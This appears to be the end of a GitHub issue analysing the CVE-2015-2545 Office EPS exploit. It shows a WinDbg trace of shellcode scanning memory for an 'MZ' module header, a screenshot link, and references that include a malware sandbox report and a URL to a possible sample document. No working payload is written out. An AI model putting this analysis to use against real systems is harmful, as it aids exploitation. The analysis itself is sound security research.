WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63be0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bd0000=458d
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bd0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f17 esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f17 6681384d5a      cmp     word ptr [eax],5A4Dh     ds:0023:63bc0000=8bf0
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f1c esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f1c 7517            jne     061e2f35                                [br=1]
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bc0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f35 esp=061e0f5a ebp=002bc870 iopl=0         ov up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000a16
061e2f35 2d00000100      sub     eax,10000h
0:000> t
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=63bb0000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f3a esp=061e0f5a ebp=002bc870 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
061e2f3a ebdb            jmp     061e2f17

```

<img width="961" alt="mem-eax-002" src="https://user-images.githubusercontent.com/7352479/29017851-a98fcb98-7b26-11e7-8142-93151488e8ec.png">


## References

1. https://www.hybrid-analysis.com/sample/3a65d4b3bc18352675cd02154ffb388035463089d59aad36cadb1646f3a3b0fc?environmentId=100
2. http://www.eteamz.com/ginysteams/files/POno46543.docx
3. https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf
4. https://www.ghostscript.com/
5. http://blog.morphisec.com/exploit-bypass-emet-cve-2015-2545
6. https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/twoforonefinal.pdf
7. https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html
8. https://gist.github.com/subTee/54e72458af1c97f02e32
9. http://casual-scrutiny.blogspot.jp/2016/02/cve-2015-2545-itw-emet-evasion.html
10. https://blogs.msdn.microsoft.com/rihamselim/2012/03/14/breaking-on-module-load/
11. https://stackoverflow.com/questions/10759661/manually-setting-breakpoints-in-windbg
12. http://bbs.pediy.com/thread-216045.htm
13. http://bbs.pediy.com/thread-216046.htm

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[Analysis] CVE-2015-2545 #13

References

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

[Analysis] CVE-2015-2545 #13

Description

References

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions